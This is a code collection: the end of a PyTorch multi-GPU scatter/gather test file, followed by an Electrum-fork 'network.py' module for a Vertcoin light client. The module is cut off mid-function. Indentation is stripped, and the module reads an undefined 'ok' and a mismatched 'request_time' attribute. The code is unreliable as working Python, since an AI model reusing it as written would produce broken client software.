@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import Queue
import os
import errno
import sys
import random
import select
import traceback
from collections import defaultdict, deque
import threading
import socks
import socket
import json
import util
import bitcoin
from bitcoin import *
from interface import Connection, Interface
import blockchain
from version import ELECTRUM_VERSION, PROTOCOL_VERSION
DEFAULT_PORTS = {'t':'55001', 's':'55002'}
#There is a schedule to move the default list to e-x (electrumx) by Jan 2018
#Schedule is as follows:
#move ~3/4 to e-x by 1.4.17
#then gradually switch remaining nodes to e-x nodes
DEFAULT_SERVERS = {
'fr1.vtconline.org': DEFAULT_PORTS,
'uk1.vtconline.org': DEFAULT_PORTS,
'vtc.horriblecoders.com': DEFAULT_PORTS,
'vtc.lukechilds.co': DEFAULT_PORTS,
'vtc-cce-1.coinomi.net': {'t':'5028'},
'vtc-cce-2.coinomi.net': {'t':'5028'},
'electrum.catpool.io': DEFAULT_PORTS,
'electrum2.catpool.io': DEFAULT_PORTS,
'www.verters.com': {'t': '51001'},
}
'''
def set_testnet():
global DEFAULT_PORTS, DEFAULT_SERVERS
DEFAULT_PORTS = {'t':'51001', 's':'51002'}
DEFAULT_SERVERS = {
'electrum-ltc.bysh.me': DEFAULT_PORTS,
'electrum.ltc.xurious.com': DEFAULT_PORTS,
}
'''
def set_nolnet():
global DEFAULT_PORTS, DEFAULT_SERVERS
DEFAULT_PORTS = {'t':'52001', 's':'52002'}
DEFAULT_SERVERS = {
'14.3.140.101': DEFAULT_PORTS,
}
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
try:
is_recent = cmp(util.normalize_version(version), util.normalize_version(PROTOCOL_VERSION)) >= 0
except Exception:
is_recent = False
if out and is_recent:
out['pruning'] = pruning_level
servers[host] = out
return servers
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if type(p) != dict:
return None
return ':'.join([p.get('mode'),p.get('host'), p.get('port'), p.get('user'), p.get('password')])
def deserialize_proxy(s):
if type(s) not in [str, unicode]:
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).split(':')
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if type(config) == type({}) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server')
# Sanitize default server
try:
deserialize_server(self.default_server)
except:
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
# subscriptions and requests
self.subscribed_addresses = set()
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.socket_queue = Queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r") as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w") as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
self.queue_request('blockchain.relayfee', [])
for addr in self.subscribed_addresses:
self.queue_request('blockchain.address.subscribe', [addr])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return self.interfaces.keys()
def get_servers(self):
if self.irc_servers:
out = self.irc_servers.copy()
out.update(DEFAULT_SERVERS)
else:
out = DEFAULT_SERVERS
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._socket.getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in self.interfaces.values():
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = Queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items()))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.fee_estimates[i] = fee
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.get_chunk':
self.on_get_chunk(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.address.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.address.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
for interface in self.interfaces.values():
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
def request_chunk(self, interface, idx):
interface.print_error("requesting chunk %d" % idx)
self.queue_request('blockchain.block.get_chunk', [idx], interface)
interface.request = idx
interface.req_time = time.time()
def on_get_chunk(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
interface.print_error(error or 'bad response')
return
# Ignore unsolicited chunks
index = params[0]
if interface.request != index:
return
connect = interface.blockchain.connect_chunk(index, result)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
elif interface.mode == 'default':
if not ok:
interface.print_error("default: cannot connect %d"% height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
else:
interface.print_error("we are ok", height, interface.request)
next_height = None
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // 2016)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in self.interfaces.values():
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as (code, msg):
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
if b.get_hash(0) == bitcoin.GENESIS:
self.downloading_headers = False
return
filename = b.path()
def download_thread():
try:
import urllib, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.HEADERS_URL)
urllib.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
with b.lock: b.update_size()
self.downloading_headers = False
self.downloading_headers = True
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.downloading_headers:
time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = filter(lambda i: i.blockchain==b, self.interfaces.values())
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
queue = Queue.Queue()
self.send([request], queue.put)
try:
r = queue.get(True, timeout)
except Queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
